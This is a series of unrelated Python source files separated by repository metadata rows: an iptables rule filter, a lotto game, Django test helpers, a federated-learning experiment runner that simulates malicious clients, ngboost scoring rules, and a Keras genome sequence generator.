        if output:
            lines = output.split('\n')
            for line in lines:
                # break the iptables output into tokens
                # assumptions:
                # 2nd item is the protocol - tokens[1]
                # 5th item is the hostname - tokens[4]
                # 7th item is the portname - tokens[6]
                tokens = line.split()
                if len(tokens) >= 7:
                    # NOTE(review): 'all' normally appears in the protocol
                    # column (tokens[1]); testing tokens[2] (the opt column)
                    # for it looks suspicious — verify against real
                    # iptables -L INPUT output.
                    if ((tokens[1] == protocol or tokens[2] == "all") and
                            tokens[4] in hostnames and
                            ( not port or (tokens[6] == "dpt:" + str(portname) or tokens[6] == "dpt:" + str(portnum)))
                            ):
                        if color:
                            if line.startswith('ACCEPT'):
                                result.append(termcolor.colored(line, 'green'))
                            elif (line.startswith('REJECT') or
                                    line.startswith('DROP')):
                                result.append(termcolor.colored(line, 'red'))
                            else:
                                result.append(line)
                        else:
                            result.append(line)
        # If we have any output, let's also display some headers
        if result:
            result.insert(0, '')
            result.insert(1, 'IP Packet filter rules')
            result.insert(2, '======================')
        return result
| 37.359281 | 114 | 0.484212 |
f353999cabd0b31f74ad52f4e235abfa57b62882 | 3,111 | py | Python | lotto_class.py | idel28102001/loto_game | fb672f6878f871bf294ff0f1f99fea2eda4aeb15 | [
"MIT"
] | null | null | null | lotto_class.py | idel28102001/loto_game | fb672f6878f871bf294ff0f1f99fea2eda4aeb15 | [
"MIT"
] | null | null | null | lotto_class.py | idel28102001/loto_game | fb672f6878f871bf294ff0f1f99fea2eda4aeb15 | [
"MIT"
] | null | null | null | import random
from lotto_funcs import rand_nums, lotto_nums, lines_lotto
def decorator(f):
    """Pretty-print the ``(line, name)`` pair returned by the wrapped callable.

    The wrapped function must return a two-tuple ``(line, name)``. The
    wrapper prints ``name`` as a banner, then ``line`` without its trailing
    two characters, and now also passes the original result through
    (previously it was silently discarded, so decorated functions always
    returned None).
    """
    import functools  # local import: keeps the module's import surface unchanged

    @functools.wraps(f)  # preserve the wrapped function's name/docstring
    def inner_func(*args, **kwargs):
        line, name = f(*args, **kwargs)
        print('-' * 6, name, '-' * 6)
        print(line[:-2])
        print('-' * 26)
        return line, name
    return inner_func
class Bingo:
    """A single lotto player holding one randomly generated card."""

    def __init__(self, name, gamer='y'):
        # Player identity and whether a human ('y') or the computer plays it.
        self.name = name
        self.gamer = gamer
        # Draw the raw numbers first; the card layout is derived from them.
        self.nums = rand_nums()
        self.lotto, self.all_nums = lotto_nums(self.nums)

    @decorator
    def lines_func(self, input_nums):
        """Render the card against the drawn numbers (printed via @decorator)."""
        card_lines, self.won_nums = lines_lotto(self.lotto, input_nums)
        return card_lines, self.name

    def __call__(self, input_nums):
        """Convenience: calling the player re-renders their card."""
        self.lines_func(input_nums)
class WholeGame:
    """Drives a full lotto session: player registration plus the draw loop.

    All prompts/messages are user-facing Russian strings and are left
    untouched on purpose.
    """
    def __init__(self):
        self.answer = None
        # name -> [Bingo instance, 1 if human else 0]
        self.gamers = dict()
        # Iterator over a shuffled bag of 89 unique barrels (1..89).
        self.all_game = iter(random.sample(range(1, 90), 89))
        # Barrels drawn so far.
        self.finish_nums = []
        self.done = False
        self._ans = None
    @property
    def answer_method(self):
        # Last validated y/n answer.
        return self._ans
    @answer_method.setter
    def answer_method(self, arg):
        # Accept only 'y', 'n' or None; anything else raises so y_n() re-asks.
        if arg != 'y' and arg != 'n' and arg is not None:
            raise NameError('Ответ должен быть y или n')
        self._ans = arg
    def y_n(self, msg, arg=''):
        # Keep asking (recursively) until the user enters y or n.
        try:
            self.answer_method = input(f'{msg} (y/n) ')
        except NameError:
            print('Вводите y или n')
            return self.y_n(msg, arg)
        else:
            return self._ans
    def __getitem__(self, item):
        # game[name] -> the [Bingo, is_human] record of that player.
        return self.gamers[item]
    def __contains__(self, item):
        # barrel in game: is the number on the *current* player's card?
        # (relies on self.i being set by the loop in game())
        return item in self[self.i][0].all_nums
    def __bool__(self):
        # True when the current player (self.i) is human.
        return bool(self[self.i][1])
    def players(self):
        # Register players recursively until the stop word is entered.
        answer = input('Введите имя игрока или стоп-слово(stop) ')
        if answer == 'stop':
            pass
        else:
            self.answer_method = self.y_n('Это человек?')
            self.gamers[answer] = [Bingo(answer, self.answer_method), 1 if self._ans == 'y' else 0]
            self.players()
    def __len__(self):
        # Number of barrels drawn so far.
        return len(self.finish_nums)
    def game(self):
        # One recursive round: draw a barrel, re-render every card, let the
        # human decide whether to cross out, then recurse until someone wins,
        # someone loses, or the bag of 89 barrels is exhausted.
        if self.done or not int(89 - len(self)):
            pass
        else:
            barrel = next(self.all_game)
            print(f'Новый бочонок: {barrel} (осталось {abs(len(self) - 89)})')
            for self.i in self.gamers:
                self[self.i][0](self.finish_nums)
                # A complete line of 5 crossed numbers wins the game.
                if 5 in self[self.i][0].won_nums:
                    print(f'У нас есть победитель - {self.i}!!!')
                    self.done = True
                    break
            if bool(self):
                self.answer_method = self.y_n('Зачеркнуть цифру?')
                # A human loses on a wrong decision: crossing a number that is
                # not on the card, or skipping one that is.
                if (self._ans == 'y' and barrel in self) or (self._ans == 'n' and barrel not in self):
                    pass
                else:
                    print('Вы проиграли')
                    self.done = True
            self.finish_nums.append(barrel)
            self.game()
    def __call__(self):
        # Full session: register the players, then run the draw loop.
        self.players()
        self.game()
if __name__ == '__main__':
    # Entry point: build and run one interactive lotto session.
    game = WholeGame()
    game()
| 27.776786 | 106 | 0.533269 |
943d262b257456b160300d08e106173ec369e225 | 2,494 | py | Python | spirit/core/tests/utils.py | igorshevk/oknoname | 0828504afb8fdae5f5e85040bec1d95cb27ce471 | [
"MIT"
] | 1 | 2022-01-09T19:53:55.000Z | 2022-01-09T19:53:55.000Z | spirit/core/tests/utils.py | igorshevk/oknoname | 0828504afb8fdae5f5e85040bec1d95cb27ce471 | [
"MIT"
] | 5 | 2021-06-08T21:03:58.000Z | 2022-03-12T00:18:43.000Z | spirit/core/tests/utils.py | BinaryTree0/fer3 | 85c3bbf2f328e69ad4d7c01b6e2c8d4ef1d9e0a3 | [
"MIT"
] | 1 | 2022-02-15T16:56:49.000Z | 2022-02-15T16:56:49.000Z | # -*- coding: utf-8 -*-
from django.contrib.auth import get_user_model
from django.core.cache import caches, cache
from ...core.conf import settings
from ...topic.models import Topic
from ...category.models import Category
from ...comment.models import Comment
from ...topic.private.models import TopicPrivate
User = get_user_model()
def create_user(**kwargs):
    """Create and return a test ``User``, generating any missing fields."""
    if 'username' not in kwargs:
        # Unique-ish name derived from the current user count.
        kwargs['username'] = "user_foo%d" % User.objects.all().count()
    if 'email' not in kwargs:
        kwargs['email'] = "%s@bar.com" % kwargs['username']
    kwargs.setdefault('password', "bar")
    return User.objects.create_user(**kwargs)
def create_topic(category, **kwargs):
    """Create and return a test ``Topic`` in *category*.

    A fresh user and a generated title are supplied when not given.
    """
    if 'user' not in kwargs:
        kwargs['user'] = create_user()
    if 'title' not in kwargs:
        # Derived from the current topic count, so titles stay unique-ish.
        kwargs['title'] = "topic_foo%d" % Topic.objects.all().count()
    return Topic.objects.create(category=category, **kwargs)
def create_private_topic(**kwargs):
    """Create a topic in the reserved private category and return its
    ``TopicPrivate`` access record (owned by the topic's author)."""
    assert 'category' not in kwargs, "do not pass category param"
    category = Category.objects.get(pk=settings.ST_TOPIC_PRIVATE_CATEGORY_PK)
    topic = create_topic(category=category, **kwargs)
    return TopicPrivate.objects.create(topic=topic, user=topic.user)
def create_category(**kwargs):
    """Create and return a test ``Category`` with generated title/sort."""
    existing = Category.objects.all()
    if 'title' not in kwargs:
        kwargs['title'] = "category_foo%d" % existing.count()
    if 'sort' not in kwargs:
        # Append at the end of the current ordering.
        kwargs['sort'] = existing.count() + 1
    return Category.objects.create(**kwargs)
def create_subcategory(category, **kwargs):
    """Create and return a test ``Category`` nested under *category*."""
    if 'title' not in kwargs:
        kwargs['title'] = "subcategory_foo%d" % Category.objects.all().count()
    return Category.objects.create(parent=category, **kwargs)
def create_comment(**kwargs):
    """Create and return a test ``Comment``; text, html and author are
    generated when absent."""
    if 'comment' not in kwargs:
        kwargs['comment'] = "comment_foobar%d" % Comment.objects.all().count()
    if 'comment_html' not in kwargs:
        # Mirror the raw comment when no rendered html is provided.
        kwargs['comment_html'] = kwargs['comment']
    if 'user' not in kwargs:
        kwargs['user'] = create_user()
    return Comment.objects.create(**kwargs)
def login(test_case_instance, user=None, password=None):
    """Log *user* (default: the test case's ``user``) into the test client
    and assert that authentication succeeded.

    The default password "bar" matches the one set by ``create_user``.
    """
    user = user or test_case_instance.user
    password = password or "bar"
    login_successful = test_case_instance.client.login(
        username=user.username,
        password=password)
    test_case_instance.assertTrue(login_successful)
def cache_clear():
    """Clear the default cache and every configured cache backend."""
    cache.clear()  # Default one
    for c in caches.all():
        c.clear()
| 28.022472 | 78 | 0.677626 |
a9d1c8cd39193b1f1a77daa6269dff38eff2f75c | 15,764 | py | Python | main.py | stefansturlu/FederatedMedical | d753acda850e0d8cf64fc1d5c19e7018494bc16a | [
"MIT"
] | 3 | 2021-06-24T12:27:26.000Z | 2022-03-28T02:30:04.000Z | main.py | stefansturlu/FederatedMedical | d753acda850e0d8cf64fc1d5c19e7018494bc16a | [
"MIT"
] | null | null | null | main.py | stefansturlu/FederatedMedical | d753acda850e0d8cf64fc1d5c19e7018494bc16a | [
"MIT"
] | 1 | 2021-11-29T20:18:18.000Z | 2021-11-29T20:18:18.000Z | from torch import optim
from utils.typings import BlockedLocations, Errors, FreeRiderAttack, PersonalisationMethod
from datasetLoaders.DatasetInterface import DatasetInterface
from experiment.CustomConfig import CustomConfig
import os
from typing import Callable, Dict, List, NewType, Optional, Tuple, Dict, Type
import json
from loguru import logger
from experiment.DefaultExperimentConfiguration import DefaultExperimentConfiguration
from datasetLoaders.MNIST import DatasetLoaderMNIST
from datasetLoaders.COVIDx import DatasetLoaderCOVIDx
from datasetLoaders.COVID19 import DatasetLoaderCOVID19
from datasetLoaders.Pneumonia import DatasetLoaderPneumonia
from classifiers import MNIST, CovidNet, CNN, Pneumonia
from logger import logPrint
from client import Client
import matplotlib.pyplot as plt
import numpy as np
import random
import torch
import time
import gc
from torch import cuda, Tensor, nn
from aggregators.Aggregator import Aggregator, allAggregators
from aggregators.AFA import AFAAggregator
from aggregators.FedMGDAPlusPlus import FedMGDAPlusPlusAggregator
from aggregators.FedAvg import FAAggregator
from aggregators.COMED import COMEDAggregator
from aggregators.Clustering import ClusteringAggregator
from aggregators.MKRUM import MKRUMAggregator
from aggregators.FedPADRC import FedPADRCAggregator
from aggregators.FedBE import FedBEAggregator
from aggregators.FedDF import FedDFAggregator
from aggregators.FedABE import FedABEAggregator
SEED = 0
# Colours used for graphing, add more if necessary
COLOURS: List[str] = [
"midnightblue",
"tab:blue",
"tab:orange",
"tab:green",
"tab:red",
"tab:cyan",
"tab:purple",
"tab:pink",
"tab:olive",
"tab:brown",
"tab:gray",
"chartreuse",
"lightcoral",
"saddlebrown",
"blueviolet",
"navy",
"cornflowerblue",
"thistle",
"dodgerblue",
"crimson",
"darkseagreen",
"maroon",
"mediumspringgreen",
"burlywood",
"olivedrab",
"linen",
"mediumorchid",
"teal",
"black",
"gold",
]
def __experimentOnMNIST(
    config: DefaultExperimentConfiguration, title="", filename="", folder="DEFAULT"
) -> Dict[str, Errors]:
    """Run the standard experiment pipeline on the MNIST dataset."""
    return __experimentSetup(
        config,
        DatasetLoaderMNIST().getDatasets,
        MNIST.Classifier,
        title,
        filename,
        folder,
    )
def __experimentOnCOVID19(
    config: DefaultExperimentConfiguration, title="", filename="", folder="DEFAULT"
) -> Dict[str, Errors]:
    """
    COVID19 Experiment with default settings.

    Uses the COVID19 dataset loader with the generic CNN classifier and
    delegates all training, persistence and plotting to ``__experimentSetup``.
    """
    dataLoader = DatasetLoaderCOVID19().getDatasets
    classifier = CNN.Classifier
    return __experimentSetup(config, dataLoader, classifier, title, filename, folder)
def __experimentOnCOVIDx(
    config: DefaultExperimentConfiguration,
    model="COVIDNet",
    title="",
    filename="",
    folder="DEFAULT",
) -> Dict[str, Errors]:
    """Run the standard experiment pipeline on the COVIDx dataset.

    ``model`` selects the classifier: "COVIDNet" or "resnet18".
    """
    datasetLoader = DatasetLoaderCOVIDx().getDatasets
    classifiers = {
        "COVIDNet": CovidNet.Classifier,
        "resnet18": CNN.Classifier,
    }
    if model not in classifiers:
        raise Exception("Invalid Covid model name.")
    return __experimentSetup(
        config, datasetLoader, classifiers[model], title, filename, folder
    )
def __experimentOnPneumonia(
    config: DefaultExperimentConfiguration, title="", filename="", folder="DEFAULT"
) -> Dict[str, Errors]:
    """
    Pneumonia Experiment with extra settings in place to incorporate the necessary changes.

    Note: mutates the passed ``config`` in place (batch size, labels, loss
    and optimizer) before delegating to ``__experimentSetup``.
    """
    datasetLoader = DatasetLoaderPneumonia().getDatasets
    classifier = Pneumonia.Classifier
    # Each client now only has like 80-170 images so a batch size of 200 is pointless
    config.batchSize = 30
    # Binary classification setup: two labels with binary cross-entropy loss
    # and RMSprop as the optimizer.
    config.labels = torch.tensor([0, 1])
    config.Loss = nn.BCELoss
    config.Optimizer = optim.RMSprop
    return __experimentSetup(config, datasetLoader, classifier, title, filename, folder)
# def __experimentOnDiabetes(config: DefaultExperimentConfiguration):
# datasetLoader = DatasetLoaderDiabetes(
# config.requireDatasetAnonymization
# ).getDatasets
# classifier = Diabetes.Classifier
# __experimentSetup(config, datasetLoader, classifier)
# def __experimentOnHeartDisease(config: DefaultExperimentConfiguration):
# dataLoader = DatasetLoaderHeartDisease(
# config.requireDatasetAnonymization
# ).getDatasets
# classifier = HeartDisease.Classifier
# __experimentSetup(config, dataLoader, classifier)
def __experimentSetup(
    config: DefaultExperimentConfiguration,
    datasetLoader: Callable[
        [Tensor, Tensor, Optional[Tuple[int, int]]], Tuple[List[DatasetInterface], DatasetInterface]
    ],
    classifier,
    title: str = "DEFAULT_TITLE",
    filename: str = "DEFAULT_NAME",
    folder: str = "DEFAULT_FOLDER",
) -> Dict[str, Errors]:
    """
    Runs every configured aggregator on the given dataset/classifier pair,
    persists the error rates and blocked-client records as JSON under
    ``folder``, and optionally plots the error curves.

    Returns a mapping from aggregator display name to its per-round errors.
    """
    __setRandomSeeds()
    gc.collect()
    cuda.empty_cache()
    errorsDict: Dict[str, Errors] = {}
    blocked: Dict[str, BlockedLocations] = {}

    for aggregator in config.aggregators:
        # Display name, e.g. "FedMGDAPlusPlusAggregator" -> "FedMGDA++".
        name = aggregator.__name__.replace("Aggregator", "")
        name = name.replace("Plus", "+")
        logPrint("TRAINING {}".format(name))
        if config.privacyPreserve is not None:
            errors, block = __runExperiment(
                config, datasetLoader, classifier, aggregator, config.privacyPreserve, folder
            )
        else:
            # privacyPreserve unset: run both without and with differential
            # privacy; only the DP run's results are kept below.
            errors, block = __runExperiment(
                config, datasetLoader, classifier, aggregator, False, folder
            )
            logPrint("TRAINING {} with DP".format(name))
            errors, block = __runExperiment(
                config, datasetLoader, classifier, aggregator, True, folder
            )

        errorsDict[name] = errors.tolist()
        blocked[name] = block

    # Writing the blocked lists and errors to json files for later inspection.
    if not os.path.isdir(folder):
        os.makedirs(folder)
    if not os.path.isdir(f"{folder}/json"):
        os.mkdir(f"{folder}/json")
    if not os.path.isdir(f"{folder}/graphs"):
        os.mkdir(f"{folder}/graphs")
    # NOTE(review): the literal "(unknown)" below looks like a scrubbed
    # placeholder for the `filename` parameter — confirm and restore if so.
    with open(f"{folder}/json/(unknown) blocked.json", "w+") as outfile:
        json.dump(blocked, outfile)
    with open(f"{folder}/json/(unknown) errors (Seed: {SEED}).json", "w+") as outfile:
        json.dump(errorsDict, outfile)

    # Plots the individual aggregator errors
    if config.plotResults:
        plt.figure()
        i = 0
        for name, err in errorsDict.items():
            # plt.plot(err.numpy(), color=COLOURS[i])
            plt.plot(err, color=COLOURS[i])
            i += 1
        plt.legend(errorsDict.keys())
        plt.xlabel(f"Rounds - {config.epochs} Epochs per Round")
        plt.ylabel("Error Rate (%)")
        plt.title(title, loc="center", wrap=True)
        plt.ylim(0, 1.0)
        plt.savefig(f"{folder}/graphs/(unknown).png", dpi=400)
    return errorsDict
def __runExperiment(
    config: DefaultExperimentConfiguration,
    datasetLoader: Callable[
        [Tensor, Tensor, Optional[Tuple[int, int]]], Tuple[List[DatasetInterface], DatasetInterface]
    ],
    classifier: nn.Module,
    agg: Type[Aggregator],
    useDifferentialPrivacy: bool,
    folder: str = "test",
) -> Tuple[Errors, BlockedLocations]:
    """
    Sets up the experiment to be run.

    Initialises each aggregator appropriately, trains it against the test
    dataset, and returns the per-round errors together with the record of
    blocked clients.
    """
    serverDataSize = config.serverData
    # if not (agg is FedBEAggregator or agg is FedDFAggregator or agg is FedABEAggregator):
    # Aggregators that do not require server-side (distillation) data get an
    # empty server split.
    if not agg.requiresData():
        print("Type of agg:", type(agg))
        print("agg:", agg)
        serverDataSize = 0
    trainDatasets, testDataset, serverDataset = datasetLoader(
        config.percUsers,
        config.labels,
        config.datasetSize,
        config.nonIID,
        config.alphaDirichlet,
        serverDataSize,
    )
    # TODO: Print client data partition, i.e. how many of each class they have. Plot it and put it in report.
    # NOTE(review): minlength=10 assumes at most 10 classes (e.g. MNIST) —
    # confirm for other datasets.
    clientPartitions = torch.stack([torch.bincount(t.labels, minlength=10) for t in trainDatasets])
    logPrint(
        f"Client data partition (alpha={config.alphaDirichlet}, percentage on server: {100*serverDataSize:.2f}%)"
    )
    # logPrint(f"Data per client: {clientPartitions.sum(dim=1)}")
    logPrint(f"Number of samples per class for each client: \n{clientPartitions}")

    clients = __initClients(config, trainDatasets, useDifferentialPrivacy)
    # Requires model input size update due to dataset generalisation and categorisation
    if config.requireDatasetAnonymization:
        classifier.inputSize = testDataset.getInputSize()
    model = classifier().to(config.aggregatorConfig.device)
    name = agg.__name__.replace("Aggregator", "")
    aggregator = agg(clients, model, config.aggregatorConfig)

    # Aggregator-specific initialisation: each family needs different extra
    # configuration before training can start.
    if isinstance(aggregator, AFAAggregator):
        aggregator.xi = config.aggregatorConfig.xi
        aggregator.deltaXi = config.aggregatorConfig.deltaXi
    elif isinstance(aggregator, FedMGDAPlusPlusAggregator):
        aggregator.reinitialise(config.aggregatorConfig.innerLR)
    elif isinstance(aggregator, FedPADRCAggregator) or isinstance(aggregator, ClusteringAggregator):
        aggregator._init_aggregators(config.internalAggregator, config.externalAggregator)
    # elif isinstance(aggregator, FedBEAggregator) or isinstance(aggregator, FedDFAggregator) or isinstance(aggregator, FedABEAggregator):
    elif aggregator.requiresData():
        # Move the server split onto the aggregator's device for distillation.
        serverDataset.data = serverDataset.data.to(aggregator.config.device)
        serverDataset.labels = serverDataset.labels.to(aggregator.config.device)
        aggregator.distillationData = serverDataset

    errors: Errors = aggregator.trainAndTest(testDataset)
    blocked = BlockedLocations(
        {
            "benign": aggregator.benignBlocked,
            "malicious": aggregator.maliciousBlocked,
            "faulty": aggregator.faultyBlocked,
            "freeRider": aggregator.freeRidersBlocked,
        }
    )

    # Plot mean and std values from the clients
    if config.aggregatorConfig.detectFreeRiders:
        if not os.path.exists(f"{folder}/std/{name}"):
            os.makedirs(f"{folder}/std/{name}")
        if not os.path.exists(f"{folder}/mean/{name}"):
            os.makedirs(f"{folder}/mean/{name}")
        fig = plt.figure()
        ax = fig.add_subplot(1, 1, 1)
        # NOTE(review): range(30) hard-codes 30 clients — confirm it always
        # matches config.percUsers.
        for i in range(30):
            if clients[i].free or clients[i].byz or clients[i].flip:
                ax.plot(aggregator.means[i].detach().numpy(), color="red", label="free")
            else:
                ax.plot(aggregator.means[i].detach().numpy(), color="grey", label="normal")
        # Keep only one legend entry per label (handles repeat per line) —
        # presumably handles[1]/handles[2] cover both categories; verify.
        handles, labels = ax.get_legend_handles_labels()
        plt.legend([handles[1], handles[2]], [labels[1], labels[2]])
        plt.xlabel(f"Rounds - {config.epochs} Epochs per Round")
        plt.ylabel("Mean of Weights")
        plt.title("Mean of Weights over Time", loc="center", wrap=True)
        plt.xlim(0, 30)
        plt.savefig(f"{folder}/mean/{name}/{config.name}.png")
        # plt.show()
        fig = plt.figure()
        ax = fig.add_subplot(1, 1, 1)
        for i in range(30):
            if clients[i].free or clients[i].byz or clients[i].flip:
                ax.plot(aggregator.stds[i].detach().numpy(), color="red", label="free")
            else:
                ax.plot(aggregator.stds[i].detach().numpy(), color="grey", label="normal")
        handles, labels = ax.get_legend_handles_labels()
        plt.legend([handles[1], handles[2]], [labels[1], labels[2]])
        plt.xlabel(f"Rounds - {config.epochs} Epochs per Round")
        plt.ylabel("StD of Weights")
        plt.title("Standard Deviation of Weights over Time", loc="center", wrap=True)
        plt.xlim(0, 30)
        plt.savefig(f"{folder}/std/{name}/{config.name}.png")
        # plt.show()
    return errors, blocked
def __initClients(
    config: DefaultExperimentConfiguration,
    trainDatasets: List[DatasetInterface],
    useDifferentialPrivacy: bool,
) -> List[Client]:
    """
    Initialises each client with their datasets, weights and whether they are not benign.

    Clients listed in ``config.faulty``/``config.malicious``/``config.freeRiding``
    are flagged accordingly; malicious clients also get their labels zeroed.
    """
    usersNo = config.percUsers.size(0)
    p0 = 1 / usersNo  # initial uniform aggregation weight
    logPrint("Creating clients...")
    clients: List[Client] = []
    for i in range(usersNo):
        clients.append(
            Client(
                idx=i,
                trainDataset=trainDatasets[i],
                epochs=config.epochs,
                batchSize=config.batchSize,
                learningRate=config.learningRate,
                p=p0,
                alpha=config.alpha,
                beta=config.beta,
                Loss=config.Loss,
                Optimizer=config.Optimizer,
                device=config.aggregatorConfig.device,
                useDifferentialPrivacy=useDifferentialPrivacy,
                epsilon1=config.epsilon1,
                epsilon3=config.epsilon3,
                needClip=config.needClip,
                clipValue=config.clipValue,
                needNormalization=config.needNormalization,
                releaseProportion=config.releaseProportion,
            )
        )

    nTrain = sum([client.n for client in clients])
    # Weight the value of the update of each user according to the number of training data points
    for client in clients:
        client.p = client.n / nTrain

    # Create malicious (byzantine) and faulty users
    for client in clients:
        if client.id in config.faulty:
            client.byz = True
            logPrint("User", client.id, "is faulty.")

        if client.id in config.malicious:
            client.flip = True
            logPrint("User", client.id, "is malicious.")
            # Poison the client's data — presumably sets all labels to 0;
            # confirm in DatasetInterface.zeroLabels.
            client.trainDataset.zeroLabels()

        if client.id in config.freeRiding:
            client.free = True
            logPrint("User", client.id, "is Free-Riding.")

    return clients
def __setRandomSeeds(seed=SEED) -> None:
    """
    Sets random seeds for all of the relevant modules.

    Ensures consistent and deterministic results from experiments.

    :param seed: seed applied to random, numpy, torch (CPU) and CUDA RNGs.
    """
    print(f"Setting seeds to {seed}")
    # NOTE(review): setting PYTHONHASHSEED at runtime does not affect the
    # already-running interpreter's hash randomisation; it only applies to
    # subprocesses that inherit the environment.
    os.environ["PYTHONHASHSEED"] = str(seed)
    random.seed(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    cuda.manual_seed(seed)
def experiment(exp: Callable[[], None]):
    """
    Decorator for experiments so that time can be known and seeds can be set.

    Logger catch is set for better error catching and printing but is not necessary.
    """

    @logger.catch
    def decorator():
        # Reset all RNGs so every experiment starts from the same state.
        __setRandomSeeds()
        logPrint("Experiment {} began.".format(exp.__name__))
        begin = time.time()
        exp()
        end = time.time()
        # Wall-clock duration in seconds.
        logPrint("Experiment {} took {}".format(exp.__name__, end - begin))

    return decorator
@experiment
def program() -> None:
    """
    Main program for running the experiments that you want run.

    Builds the CustomConfig, rejects the unsupported combination of
    cluster-based/FedMGDA+ aggregators with privacy amplification, then
    runs the MNIST experiment once per configured attack scenario.
    """
    config = CustomConfig()

    if (
        FedPADRCAggregator in config.aggregators or FedMGDAPlusPlusAggregator in config.aggregators
    ) and config.aggregatorConfig.privacyAmplification:
        print("Currently doesn't support both at the same time.")
        print("Size of clients is very likely to be smaller than or very close to cluster_count.")
        print(
            "FedMGDA+ relies on every client being present and training at every federated round."
        )
        exit(-1)

    for attackName in config.scenario_conversion():
        # Results are persisted to disk inside the experiment pipeline, so
        # the return value does not need to be kept here (removed the
        # previously unused `errorsDict`/`errors` locals).
        __experimentOnMNIST(
            config,
            title=f"Basic CustomConfig Test \n Attack: {attackName}",
            filename=f"{attackName}",
            folder="test",
        )
# Running the program here
program()
| 34.876106 | 138 | 0.66544 |
ea75cf2bae82bd5a8cf388363cec92729ee4c815 | 51 | py | Python | scripts/fib.py | alif0/hello_world | 529ec2540eb19fc4868aceaf5915b4a849f187b1 | [
"Apache-2.0"
] | 1 | 2020-06-23T03:34:04.000Z | 2020-06-23T03:34:04.000Z | scripts/fib.py | alif0/hello_world | 529ec2540eb19fc4868aceaf5915b4a849f187b1 | [
"Apache-2.0"
] | null | null | null | scripts/fib.py | alif0/hello_world | 529ec2540eb19fc4868aceaf5915b4a849f187b1 | [
"Apache-2.0"
] | null | null | null | import fibonacci as f
print (__name__)
f.fib(20)
| 8.5 | 21 | 0.72549 |
4498f9936a9002fc6c6c6e44cf10a77d138cdcfd | 1,056 | py | Python | ngboost/scores.py | FoundryAI/ngboost | 7a151f849b95eb31e66ea7bb290b342be4981b54 | [
"Apache-2.0"
] | 1 | 2021-08-24T14:23:20.000Z | 2021-08-24T14:23:20.000Z | ngboost/scores.py | FoundryAI/ngboost | 7a151f849b95eb31e66ea7bb290b342be4981b54 | [
"Apache-2.0"
] | null | null | null | ngboost/scores.py | FoundryAI/ngboost | 7a151f849b95eb31e66ea7bb290b342be4981b54 | [
"Apache-2.0"
] | null | null | null | import numpy as np
from ngboost.helpers import Y_from_censored
class Score():
    """Base class for scoring rules.

    Subclasses provide ``score`` (per-observation scores), ``d_score``
    (raw gradients) and ``metric`` (Riemannian metric); this base turns
    them into aggregate scores and (natural) gradients.
    """

    def total_score(self, Y, sample_weight=None):
        """Return the (optionally weighted) mean of the per-observation scores."""
        per_obs = self.score(Y)
        return np.average(per_obs, weights=sample_weight)

    def grad(self, Y, natural=True):
        """Per-observation gradient; premultiplied by the inverse metric
        when ``natural`` is True."""
        raw = self.d_score(Y)
        if not natural:
            return raw
        return np.linalg.solve(self.metric(), raw)
class LogScore(Score):
    '''
    Generic class for the log scoring rule.

    The log score is the negative log-likelihood -log(P̂(y)), i.e. the
    maximum-likelihood criterion. It ships with a default Monte-Carlo
    estimate of the Riemannian metric (the Fisher information).
    '''

    def metric(self, n_mc_samples=100):
        """Estimate the Fisher information by averaging outer products of
        the gradients over ``n_mc_samples`` sampled outcomes."""
        samples = self.sample(n_mc_samples)
        grads = np.stack([self.d_score(Y) for Y in samples])
        outer_products = np.einsum('sik,sij->sijk', grads, grads)
        return outer_products.mean(axis=0)

    # TODO: could a default d_score-based autofit be provided here?
MLE = LogScore
class CRPScore(Score):
    '''
    Generic class for the continuous ranked probability scoring rule (CRPS).

    Unlike ``LogScore``, no default Riemannian metric is provided here;
    distribution-specific subclasses must supply the full implementation.
    '''
    pass
CRPS = CRPScore | 32 | 203 | 0.667614 |
064a5c1ef1053bc4c87fd3d21ca301c8e4a21c2a | 5,547 | py | Python | keras_synthetic_genome_sequence/multivariate_gap_sequence.py | LucaCappelletti94/keras_synthetic_genome_sequence | b25c846b0bddd438da96dab9974cd3bd3fe44858 | [
"MIT"
] | null | null | null | keras_synthetic_genome_sequence/multivariate_gap_sequence.py | LucaCappelletti94/keras_synthetic_genome_sequence | b25c846b0bddd438da96dab9974cd3bd3fe44858 | [
"MIT"
] | null | null | null | keras_synthetic_genome_sequence/multivariate_gap_sequence.py | LucaCappelletti94/keras_synthetic_genome_sequence | b25c846b0bddd438da96dab9974cd3bd3fe44858 | [
"MIT"
] | null | null | null | """Keras Sequence that returns tuples of nucleotide sequences, one with multivariate synthetic gaps and the other without as ground truth."""
from typing import Union, Dict, Tuple
import pandas as pd
import numpy as np
from keras_bed_sequence import BedSequence
from keras_mixed_sequence.utils import NumpySequence
from .utils import generate_synthetic_gaps
from numba import types
from numba.typed import Dict
class MultivariateGapSequence(BedSequence):
    """
    Keras Sequence that returns tuples of nucleotide sequences,
    one with multivariate synthetic gaps and the other without as ground truth.
    """

    def __init__(
        self,
        assembly: str,
        bed: Union[pd.DataFrame, str],
        gaps_mean: np.ndarray,
        gaps_covariance: np.ndarray,
        gaps_threshold: float = 0.4,
        batch_size: int = 32,
        verbose: bool = True,
        seed: int = 42,
        elapsed_epochs: int = 0,
        genome_kwargs: Dict = None
    ):
        """Return new GapSequence object.

        Parameters
        ----------------------------
        assembly: str,
            Genomic assembly from ucsc from which to extract sequences.
            For instance, "hg19", "hg38" or "mm10".
        bed: Union[pd.DataFrame, str],
            Either path to file or Pandas DataFrame containing minimal bed columns,
            like "chrom", "chromStart" and "chromEnd".
        gaps_mean: np.ndarray,
            Mean of the multivariate Gaussian distribution to use for generating
            the gaps in the sequences. Length of the sequences must match with
            length of the mean vector.
        gaps_covariance: np.ndarray,
            Covariance matrix of the multivariate Gaussian distribution to use
            for generating the gaps in the sequences.
            Length of the sequences must match with length of the mean vector.
        gaps_threshold: float,
            Threshold for casting the multivariate Gaussian distribution to
            a binomial multivariate distribution.
        batch_size: int = 32,
            Batch size to be returned for each request.
            By default is 32.
        verbose: bool = True,
            Whetever to show a loading bar.
        seed: int = 42,
            Starting seed to use if shuffling the dataset.
        elapsed_epochs: int = 0,
            Number of elapsed epochs to init state of generator.
        genome_kwargs: Dict = None,
            Parameters to pass to the Genome object.

        Raises
        --------------------
        ValueError
            If the gaps mean or covariance length does not match the bed
            window length.

        Returns
        --------------------
        Return new GapSequence object.
        """
        super().__init__(
            assembly=assembly,
            bed=bed,
            batch_size=batch_size,
            verbose=verbose,
            seed=seed,
            elapsed_epochs=elapsed_epochs,
            genome_kwargs=genome_kwargs,
        )
        if len(gaps_mean) != self.window_length:
            raise ValueError(
                "Mean len({mean_len}) does not match bed file window len({window_len}).".format(
                    mean_len=len(gaps_mean),
                    window_len=self.window_length,
                )
            )
